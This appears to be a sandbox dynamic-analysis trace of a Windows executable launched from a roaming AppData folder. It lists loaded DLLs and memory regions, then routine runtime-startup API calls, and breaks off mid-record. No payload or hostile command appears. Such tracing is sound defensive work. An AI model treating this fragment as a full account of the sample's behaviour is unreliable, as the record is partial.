0x74e70000 end_va = 0x74fe5fff entry_point = 0x74e70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 514 start_va = 0x75260000 end_va = 0x7534ffff entry_point = 0x75260000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 515 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 516 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 517 start_va = 0x520000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 518 start_va = 0x560000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 519 start_va = 0x74b40000 end_va = 0x74b47fff entry_point = 0x74b40000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 520 start_va = 0x74b50000 end_va = 0x74be1fff entry_point = 0x74b50000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 521 start_va = 0x74d40000 end_va = 0x74d98fff entry_point = 0x74d40000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 522 start_va = 0x74da0000 end_va = 0x74da9fff entry_point = 0x74da0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 523 start_va = 0x74db0000 end_va = 0x74dcdfff entry_point = 0x74db0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 524 start_va = 0x753b0000 end_va = 0x753f3fff entry_point = 0x753b0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 525 start_va = 0x75430000 end_va = 0x767eefff entry_point = 0x75430000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 526 start_va = 0x76810000 end_va = 0x7681efff entry_point = 0x76810000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 527 start_va = 0x76a10000 end_va = 0x76a8afff entry_point = 0x76a10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 528 start_va = 0x76c40000 end_va = 0x76c82fff entry_point = 0x76c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 529 start_va = 0x76d90000 end_va = 0x76e3bfff entry_point = 0x76d90000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 530 start_va = 0x76e40000 end_va = 0x76ff9fff entry_point = 0x76e40000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 531 start_va = 0x77000000 end_va = 0x7714cfff entry_point = 0x77000000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 532 start_va = 0x77150000 end_va = 0x7728ffff entry_point = 0x77150000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 533 start_va = 0x77290000 end_va = 0x772d3fff entry_point = 0x77290000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 534 start_va = 0x77340000 end_va = 0x773ccfff entry_point = 0x77340000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 535 start_va = 0x773f0000 end_va = 0x778ccfff entry_point = 0x773f0000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 536 start_va = 0x779f0000 end_va = 0x77aadfff entry_point = 0x779f0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 537 start_va = 0x77c30000 end_va = 0x77c3bfff entry_point = 0x77c30000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 538 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 539 start_va = 0x660000 end_va = 0x7e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 540 start_va = 0x970000 end_va = 0x97ffff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 541 start_va = 0x75400000 end_va = 0x7542afff entry_point = 0x75400000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 542 start_va = 0x778d0000 end_va = 0x779effff entry_point = 0x778d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 543 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 544 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 545 start_va = 0x7f0000 end_va = 0x8affff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 546 start_va = 0x980000 end_va = 0xb00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 547 start_va = 0xb10000 end_va = 0x1f0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b10000" filename = "" Region: id = 548 start_va = 0x20f0000 end_va = 0x20fffff entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 549 start_va = 0x8b0000 end_va = 0x960fff entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 550 start_va = 0x7f0000 end_va = 0x85efff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 551 start_va = 0x8a0000 end_va = 0x8affff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 552 start_va = 0x2b0000 end_va = 0x2b1fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 571 start_va = 0x1f10000 end_va = 0x2086fff entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 572 start_va = 0x2100000 end_va = 0x2278fff entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 573 start_va = 0x1f10000 end_va = 0x2086fff entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 574 start_va = 0x2100000 end_va = 0x2278fff entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 575 start_va = 0x1f10000 end_va = 0x2086fff entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 576 start_va = 0x2100000 end_va = 0x2278fff entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 578 start_va = 0x1f10000 end_va = 0x2086fff entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 579 start_va = 0x2100000 end_va = 0x2278fff entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 580 start_va = 0x1f10000 end_va = 0x1f80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f10000" filename = "" Region: id = 581 start_va = 0x2100000 end_va = 0x2276fff entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 582 start_va = 0x2280000 end_va = 0x23f8fff entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 583 start_va = 0x2100000 end_va = 0x2276fff entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 584 start_va = 0x2280000 end_va = 0x23f8fff entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 619 start_va = 0x2100000 end_va = 0x2276fff entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 620 start_va = 0x2280000 end_va = 0x23f8fff entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Thread: id = 19 os_tid = 0xfac [0065.916] GetStartupInfoW (in: lpStartupInfo=0x19ff18 | out: lpStartupInfo=0x19ff18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0065.916] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0065.918] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0065.918] GetProcAddress (hModule=0x75260000, lpProcName="FlsAlloc") returned 0x7527a330 [0065.918] GetProcAddress (hModule=0x75260000, lpProcName="FlsGetValue") returned 0x75277580 [0065.918] GetProcAddress (hModule=0x75260000, lpProcName="FlsSetValue") returned 0x75279910 [0065.918] GetProcAddress (hModule=0x75260000, lpProcName="FlsFree") returned 0x7527f400 [0065.919] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0065.919] GetCurrentThreadId () returned 0xfac [0065.919] GetStartupInfoW (in: lpStartupInfo=0x19feb4 | out: lpStartupInfo=0x19feb4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40d031, hStdOutput=0x40d36a, hStdError=0x8a05a8)) [0065.919] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0065.919] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0065.919] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0065.919] SetHandleCount (uNumber=0x20) returned 0x20 [0065.919] GetCommandLineA () returned="\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"" [0065.919] GetEnvironmentStringsW () returned 0x2e9ee8* [0065.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\CIiHmnxMn6Ps\\Desktop", cchWideChar=1377, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1377 [0065.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\CIiHmnxMn6Ps\\Desktop", cchWideChar=1377, lpMultiByteStr=0x8a0fd0, cbMultiByte=1377, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpUsedDefaultChar=0x0) returned 1377 [0065.920] FreeEnvironmentStringsW (penv=0x2e9ee8) returned 1 [0065.920] GetLastError () returned 0xcb [0065.920] SetLastError (dwErrCode=0xcb) [0065.920] GetLastError () returned 0xcb [0065.920] SetLastError (dwErrCode=0xcb) [0065.920] GetLastError () returned 0xcb [0065.920] SetLastError (dwErrCode=0xcb) [0065.920] GetACP () returned 0x4e4 [0065.920] GetLastError () returned 0xcb [0065.920] SetLastError (dwErrCode=0xcb) [0065.920] IsValidCodePage (CodePage=0x4e4) returned 1 [0065.920] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fe7c | out: lpCPInfo=0x19fe7c) returned 1 [0065.920] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f948 | out: lpCPInfo=0x19f948) returned 1 [0065.920] GetLastError () returned 0xcb [0065.920] SetLastError (dwErrCode=0xcb) [0065.920] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0065.920] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿﴟ@Ā") returned 256 [0065.920] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿﴟ@Ā", cchSrc=256, lpCharType=0x19f95c | out: lpCharType=0x19f95c) returned 1 [0065.921] GetLastError () returned 0xcb [0065.921] SetLastError (dwErrCode=0xcb) [0065.921] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0065.921] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0065.921] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0065.921] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0065.921] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x19fc5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x45\x35\x46\xdd\x94\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0065.921] GetLastError () returned 0xcb [0065.921] SetLastError (dwErrCode=0xcb) [0065.921] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0065.921] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0065.921] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0065.921] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0065.921] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ 